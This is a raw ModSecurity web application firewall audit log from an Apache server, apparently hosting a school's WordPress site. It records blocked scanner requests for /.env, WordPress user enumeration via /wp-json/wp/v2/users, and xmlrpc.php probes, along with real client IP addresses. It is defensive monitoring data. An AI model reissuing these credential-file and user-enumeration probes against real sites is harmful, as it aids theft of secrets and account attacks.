[severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745590953193642 797 (- - -) Stopwatch2: 1745590953193642 797; combined=343, p1=295, p2=0, p3=0, p4=0, p5=47, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36657c28-Z-- --2e3bd624-A-- [25/Apr/2025:21:25:13 +0700] aAubSfKu9d5eAb6Kn99h5QAAAMk 103.236.140.4 36892 103.236.140.4 8181 --2e3bd624-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.209.195 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.209.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --2e3bd624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e3bd624-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745591113976380 762 (- - -) Stopwatch2: 1745591113976380 762; combined=314, p1=273, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e3bd624-Z-- --8ac4c474-A-- [25/Apr/2025:21:53:15 +0700] aAuh2-OdEP6frSVs8Cq4XQAAAAo 103.236.140.4 43314 103.236.140.4 8181 --8ac4c474-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.238.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.238.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ac4c474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ac4c474-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745592795930163 3405 (- - -) Stopwatch2: 1745592795930163 3405; combined=1555, p1=499, p2=965, p3=0, p4=0, p5=91, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ac4c474-Z-- --d186fa28-A-- [25/Apr/2025:22:19:25 +0700] aAun_T8HMZgF-3Y3GtG1ZAAAAEA 103.236.140.4 49394 103.236.140.4 8181 --d186fa28-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.131.15.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.131.15.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d186fa28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d186fa28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745594365184642 2558 (- - -) Stopwatch2: 1745594365184642 2558; combined=1211, p1=400, p2=782, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d186fa28-Z-- --aa447359-A-- [25/Apr/2025:22:24:49 +0700] aAupQeOdEP6frSVs8Cq6owAAABU 103.236.140.4 50628 103.236.140.4 8181 --aa447359-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36 Accept-Charset: utf-8 --aa447359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa447359-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745594689613208 825 (- - -) Stopwatch2: 1745594689613208 825; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa447359-Z-- --06471c78-A-- [25/Apr/2025:22:59:06 +0700] aAuxSuXF4ZX3hX-IbN4b2gAAAJA 103.236.140.4 49256 103.236.140.4 8181 --06471c78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.211.3.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.211.3.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06471c78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06471c78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745596746246451 3147 (- - -) Stopwatch2: 1745596746246451 3147; combined=1307, p1=420, p2=854, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06471c78-Z-- --31f4086c-A-- [25/Apr/2025:23:05:26 +0700] aAuyxuOdEP6frSVs8CrCbAAAAAU 103.236.140.4 56306 103.236.140.4 8181 --31f4086c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.170.88.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.170.88.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --31f4086c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31f4086c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745597126104948 2660 (- - -) Stopwatch2: 1745597126104948 2660; combined=1130, p1=410, p2=696, p3=0, p4=0, p5=24, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f4086c-Z-- --3414275d-A-- [25/Apr/2025:23:43:19 +0700] aAu7p_Ku9d5eAb6Kn998LAAAAM8 103.236.140.4 50914 103.236.140.4 8181 --3414275d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.176.2.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.176.2.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3414275d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3414275d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745599399552532 2696 (- - -) Stopwatch2: 1745599399552532 2696; combined=1217, p1=405, p2=783, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3414275d-Z-- --d3f49b71-A-- [26/Apr/2025:00:14:03 +0700] aAvC2-XF4ZX3hX-IbN400AAAAJU 103.236.140.4 60286 103.236.140.4 8181 --d3f49b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3f49b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3f49b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745601243695906 19897 (- - -) Stopwatch2: 1745601243695906 19897; combined=4676, p1=3539, p2=1110, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3f49b71-Z-- --7949df1f-A-- [26/Apr/2025:00:14:06 +0700] aAvC3vKu9d5eAb6Kn9-NlwAAAME 103.236.140.4 60462 103.236.140.4 8181 --7949df1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7949df1f-C-- demo.sayHello --7949df1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7949df1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745601246730385 6331 (- - -) Stopwatch2: 1745601246730385 6331; combined=4596, p1=540, p2=3669, p3=31, p4=35, p5=210, sr=74, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7949df1f-Z-- --c89ca13b-A-- [26/Apr/2025:00:21:50 +0700] aAvErj8HMZgF-3Y3GtHhTwAAAE8 103.236.140.4 59650 103.236.140.4 8181 --c89ca13b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.127.33.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.127.33.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c89ca13b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c89ca13b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745601710652239 2156 (- - -) Stopwatch2: 1745601710652239 2156; combined=948, p1=307, p2=617, p3=0, p4=0, p5=24, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c89ca13b-Z-- --a16f9c59-A-- [26/Apr/2025:00:44:56 +0700] aAvKGPKu9d5eAb6Kn9-o5AAAAM4 103.236.140.4 59622 103.236.140.4 8181 --a16f9c59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a16f9c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a16f9c59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745603096723908 2969 (- - -) Stopwatch2: 1745603096723908 2969; combined=1309, p1=427, p2=849, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a16f9c59-Z-- --97af8425-A-- [26/Apr/2025:00:44:59 +0700] aAvKG-OdEP6frSVs8CoBmQAAAAU 103.236.140.4 59810 103.236.140.4 8181 --97af8425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97af8425-C-- demo.sayHello --97af8425-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97af8425-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745603099571366 5500 (- - -) Stopwatch2: 1745603099571366 5500; combined=3947, p1=500, p2=3197, p3=29, p4=32, p5=110, sr=66, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97af8425-Z-- --70365048-A-- [26/Apr/2025:01:23:01 +0700] aAvTBT8HMZgF-3Y3GtEPBgAAAFg 103.236.140.4 36040 103.236.140.4 8181 --70365048-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 61.228.136.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 61.228.136.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70365048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70365048-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605381147188 3011 (- - -) Stopwatch2: 1745605381147188 3011; combined=1348, p1=473, p2=838, p3=0, p4=0, p5=37, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70365048-Z-- --aaef6f40-A-- [26/Apr/2025:01:26:41 +0700] aAvT4T8HMZgF-3Y3GtEP-AAAAE0 103.236.140.4 41310 103.236.140.4 8181 --aaef6f40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.52.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.52.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aaef6f40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaef6f40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605601479274 1858 (- - -) Stopwatch2: 1745605601479274 1858; combined=887, p1=278, p2=590, p3=0, p4=0, p5=19, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaef6f40-Z-- --eeeb2670-A-- [26/Apr/2025:01:31:02 +0700] aAvU5vKu9d5eAb6Kn9_G_QAAAMM 103.236.140.4 47814 103.236.140.4 8181 --eeeb2670-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeeb2670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeeb2670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745605862309741 22159 (- - -) Stopwatch2: 1745605862309741 22159; combined=4968, p1=3687, p2=1242, p3=0, p4=0, p5=38, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeeb2670-Z-- --d84fa25e-A-- [26/Apr/2025:01:31:05 +0700] aAvU6T8HMZgF-3Y3GtESVAAAAE4 103.236.140.4 47894 103.236.140.4 8181 --d84fa25e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d84fa25e-C-- demo.sayHello --d84fa25e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d84fa25e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745605865339971 7226 (- - -) Stopwatch2: 1745605865339971 7226; combined=5129, p1=718, p2=4107, p3=48, p4=42, p5=122, sr=139, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d84fa25e-Z-- --1076e374-A-- [26/Apr/2025:01:57:07 +0700] aAvbA_Ku9d5eAb6Kn9_RSwAAANU 103.236.140.4 57636 103.236.140.4 8181 --1076e374-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.227.212.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.227.212.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1076e374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1076e374-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 